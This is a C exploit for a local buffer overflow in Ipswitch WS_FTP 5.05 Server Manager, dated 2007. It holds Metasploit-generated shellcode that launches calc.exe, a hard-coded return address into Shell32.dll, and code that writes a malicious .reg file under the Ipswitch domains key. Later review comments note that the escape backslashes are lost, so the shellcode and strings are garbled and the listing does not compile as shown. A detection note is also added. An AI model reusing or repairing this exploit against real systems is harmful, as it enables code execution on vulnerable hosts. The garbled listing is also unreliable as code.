# Title : Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit
# Published : 2007-04-02
# Author : Marsu
/****************************************************************************
* Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow *
* *
* *
* There is a buffer overflow in iftpmgr.exe that can be triggered by *
* registering an overly long site command. The result is then saved in the *
* registry, so the overflow is triggered again every time the group is checked. *
* This exploit launches calc.exe. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> *
****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=165 Encoder=PexFnstenvSub http://metasploit.com */
/* Payload bytes emitted by the Metasploit generator named in the comment
 * above (the file header states it launches calc.exe).
 * NOTE(review): in this reproduction the hex escapes have lost their
 * backslashes, so the compiler sees "x29xc9..." as ordinary ASCII characters
 * rather than the 165 byte values the generator comment describes; the
 * literal as written is therefore roughly three times that length. */
unsigned char CalcShellcode[] =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x26"
"x45x32xe3x83xebxfcxe2xf4xdaxadx76xe3x26x45xb9xa6"
"x1axcex4exe6x5ex44xddx68x69x5dxb9xbcx06x44xd9xaa"
"xadx71xb9xe2xc8x74xf2x7ax8axc1xf2x97x21x84xf8xee"
"x27x87xd9x17x1dx11x16xe7x53xa0xb9xbcx02x44xd9x85"
"xadx49x79x68x79x59x33x08xadx59xb9xe2xcdxccx6exc7"
"x5Cx22x86x03x23x42xcex72xd3xa3x85x4axefxadx05x3e"
"x68x56x59x9fx68x4ex4dxd9xeaxadxc5x82xe3x26x45xb9"
"x8bx1ax1ax03x15x46x13xbbx1bxa5x85x49xb3x4ex3bxea"
"x01x55x2dxaax1dxacx4bx65x1cxc1x26x53x8fx45x6bx57"
"x9bx43x45x32xe3";
/* Entry point: writes a .reg file whose _Executable / _Arguments values
 * carry the oversized buffer described in the file header.
 *   argv[1]  group (domain) name, spliced into the registry key path
 *   argv[2]  output path of the generated .reg file
 * Returns 0 on every path, including the usage message.
 *
 * NOTE(review): memset, memcpy and strlen are used but only stdio.h and
 * stdlib.h are included, so the block relies on implicit declarations
 * (string.h is missing).
 * NOTE(review): the string literals in this listing have lost their escape
 * backslashes ("rn" where a line ending was intended, unescaped quotes
 * inside the fprintf format strings), so the block does not compile as
 * reproduced here.
 * Detection note: the observable artefact is a registry write under
 * HKLM\SOFTWARE\Ipswitch\iFtpSvc\Domains\<group>\Commands carrying an
 * overlong _Executable / _Arguments value; that key is where a defender
 * would look for this persistence vector.
 */
int main(int argc, char* argv[])
{
FILE* regfile;
char evilbuff[250];
printf("[+] Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflown");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
/* Exactly two arguments are required: <Group> and <file.reg>. */
if (argc!=3) {
printf("[+] Usage: %s <Group> <file.reg>n",argv[0]);
printf("[+] ex: %s Marsu Pilami.regn",argv[0]);
return 0;
}
/* Fill the whole 250-byte buffer with 'C' padding. */
memset(evilbuff,'C',250);
/* NOTE(review): as reproduced, CalcShellcode is a plain ASCII string far
 * longer than the 165 bytes the generator comment states, so this memcpy
 * would overrun evilbuff; strlen on an unsigned char array also mismatches
 * its const char* prototype. */
memcpy(evilbuff+4,CalcShellcode,strlen(CalcShellcode));
memcpy(evilbuff+202,"x46xE4xBDx7C",4); /*00 50 00 00 in Shell32.dll. We need this to jump back to our shellcode =)
CALL DWORD PTR DS:[EDX+90] and our code is at 0x00500040 in DS*/
/* NUL-terminate at offset 215 so the %s conversions below stop there. */
memset(evilbuff+215,0,1);
/* NOTE(review): fopen's result is not checked; a NULL regfile would be
 * passed straight to fprintf and fclose. */
regfile=fopen(argv[2],"wb");
fprintf(regfile,"Windows Registry Editor Version 5.00rnrn");
fprintf(regfile,"[HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\iFtpSvc\Domains\%s\Commands]rnrn",argv[1]);
fprintf(regfile,"[HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\iFtpSvc\Domains\%s\Commands\aa]rn"_Executable"="%s"rn",argv[1],evilbuff);
fprintf(regfile,""_Arguments"="%s"rn",evilbuff);
fprintf(regfile,""*everyone"=dword:000000ffrnrn");
/* NOTE(review): fclose's return value is ignored on a write stream, so a
 * failed flush goes unreported. */
fclose(regfile);
printf("[+] Done. Have fun!n");
return 0;
}